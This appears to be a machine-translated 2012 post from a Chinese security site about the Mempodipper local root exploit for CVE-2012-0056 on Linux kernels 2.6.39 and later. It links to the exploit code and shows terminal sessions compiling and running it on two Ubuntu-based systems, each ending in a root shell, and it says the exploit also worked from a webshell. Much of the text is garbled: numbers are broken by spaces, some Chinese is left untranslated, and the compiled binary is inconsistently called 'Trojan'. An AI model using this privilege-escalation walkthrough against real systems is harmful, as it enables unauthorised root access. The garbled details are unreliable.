Linux kernels >=2.6.39 local root exploit 0day-vulnerability warning-the black bar safety net

2012-01-25T00:00:00
ID MYHACK58:62201232980
Type myhack58
Reporter 佚名
Modified 2012-01-25T00:00:00

Description

This is absolutely awesome, and 2.6.39 on top of the kernel all the presence of this vulnerability. Original source http://blog. zx2c4. com/7 4 9, The 利用 代码 可 在 这里 找到 http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html the.

The use of the/proc/pid/mem write,/poc file system is a virtual file system, does not occupy any disk space, the system is running good reflect the dynamic, the system can be used as a kernel data structure's interface./ proc/pid/mem is a read-write process of the memory interface. The use of very cleverly, e text good you can see the original. Here a test under power.

I'm in 2. 6. 3 9. 4 and 3. 0. 0-1 2 The test is successful, the platform respectively, is the bt5r1(ubuntu10. 0 4)and ubuntu11. 1 to 0.

ubuntu11. 1 0:

left@left-T-6843c:~$uname-a

Linux left-T-6843c 3.0.0-1 2-generic #2 0-Ubuntu SMP Fri Oct 7 1 4:5 0:4 2 UTC 2 0 1 1 i686 i686 i386 GNU/Linux

left@left-T-6843c:~$id

uid=1 0 0 0(left) gid=1 0 0 0(left) groups=1 0 0 0(left),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare)

left@left-T-6843c:~$ cd desktop

left@left-T-6843c:~/desktop$ gcc-o exploit exploit. c

left@left-T-6843c:~/desktop$ chmod +x exploit

left@left-T-6843c:~/desktop$ ./ Trojan

===============================

= Mempodipper =

= by zx2c4 =

= Jan 2 1, 2 0 1 2 =

===============================

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3 4 1 7/mem in the chi ld.

[+] Sending fd 5 to pare nt.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading gpasswd for exit@plt.

[+] Resolved exit@plt to 0x8049770.

[+] Calculating gpasswd padding.

[+] Seeking to offset 0x8049760.

[+] Executing gpasswd with shellcode.

id

uid=0(root) gid=0(root) groups=0(root),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare),1 0 0 0(left)

In bt5r1 test on the left@bt:~$ cd Desktop

left@bt:~/Desktop$ id

uid=1 0 0 1(left) gid=1 0 0 1(left) groups=1 0 0 1(left)

left@bt:~/Desktop$ uname-a

Linux bt 2.6.39.4 #1 SMP Thu Aug 1 8 1 3:3 8:0 2 p.m. NZST 2 0 1 1 i686 GNU/Linux

left@bt:~/Desktop$ chmod +x exploit

left@bt:~/Desktop$ ./ Trojan

===============================

= Mempodipper =

= by zx2c4 =

= Jan 2 1, 2 0 1 2 =

===============================

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/1 8 8 5/mem in child.

[+] Sending fd 5 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading gpasswd for exit@plt.

[+] Resolved exit@plt to 0x8049dc0.

[+] Calculating gpasswd padding.

[+] Seeking to offset 0x8049db0.

[+] Executing gpasswd with shellcode.

sh-4.1# id

uid=0(root) gid=0(root) groups=1 0 0 1(left)

I'm in a webshell on the test is also successful, very to the force.